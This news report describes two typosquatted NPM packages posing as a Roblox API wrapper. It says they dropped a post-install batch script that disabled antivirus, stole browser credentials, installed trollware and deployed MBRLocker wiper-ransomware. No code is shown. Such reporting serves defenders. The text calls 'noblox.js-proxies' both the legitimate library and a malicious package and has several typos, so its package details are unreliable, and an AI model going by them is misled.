Malicious NPM packages used to install password stealer and ransomware

Pretend Roblox libraries deliver ransomware and information-stealing trojan

The handful of malicious activities launched on the system when the malicious libraries pretended to be legitimate Roblox package

Criminals managed to spread malicious programs by publishing the two typo-squatted libraries to the official NPM repository that mimics a legitimate Roblox package.^[1] Unsuspected users got the password stealer malware and ransomware virus loaded on the system. The two NPM packages got named nblox.js-proxy and noblox.js-proxies. The change of only one letter in the name of the library allowed attackers to pretend that this is the legitimate Roblox API wrapper called noblox.js-proxies.^[2]

The report^[3] informed about the open-source ecosystem abuse to deploy ransomware. The issue was detected pretty quickly, so typosquats made little impact. However, threat actors aimed big, and since this is a popular component, the incident, if not detected in time, could have major consequences.

Sonatype researcher Juan Aguirre stated:

They both had minimal impact with Noblox.js-proxy seeing 281 total downloads and Noblox.js-proxies seeing 106 total downloads, but it’s clear what type of scale the threat actors were hoping for going after such a popular component.

Further analysis showed that the malicious NPMs delivered the MBRLocker ransomware that is impersonating the GoldenEey ransomware.^[4] In addition to the cryptovirus, trollware and password-stealing trojan got dropped. Libraries got taken down and should be no longer available or dangerous.

A full list of malicious behavior

The discovery of this malicious package showed that the Batch script got dropped in the post-installation JavaScript file. The script downloads the malware executables from the Discords content delivery network and disables the anti-malware engines. This is how persistence can be achieved ant then other activities follow:

• browser credential siphoning^[5];
• employment of binaries;
• ransomware drop;
• trollware installations;
• password stealing trojan deployment.

The particular malicious files provided by the researchers and their analysis show that different activities launched the scripts affecting the Microsft Defender, malware that steals data from browsers like history, cookies, saved passwords, attempts to record video bu triggering the built-in web camera. Also, trollware that is set to modify the current user name to UR NEXT got executed. This piece plays videos, alters passwords, attempts to lock the victim out of their system.

Tunamor.exe loading the MBRLocker on the machine

The particular ransomware that gets installed is a version of MBRLocker – Monster ransomware.^[6] The particular executable launched the drop of the file virus. The forced restart gets performed once activated, and the fake CHDSK windows appear on the system. This is the time when ransomware starts encrypting the computer files.

Once the process is done, the system rebooted, and the skull with crossbones appears as the lock screen. This is the typical Petya/GoldenEye ransomware behavior that this MBRLocker copies and tries to resemble. The information about hard disk encryption appears on the screen when any of the keys get pressed, so the ransom note is delivered, and victims get encouraged to visit a Tor site where further actions – paying the ransom, get listed.

The criminals claim to offer the decryption, but the analysis showed that provided decryption keys do not work and the computer runs the alleged decrytpion, but Windows get scrambled instead during that time. It seems that this is not the file-locker but wiper ransomware that is designed to destroy the system when the payment is transferred without providing the opportunity to recover any files.

It is not spread wide and only distributed using these NPM packages. It is fortunate for the ransomware distribution, but these malicious NPMs might be used in other supply chains like this and become more common while also more dangerous.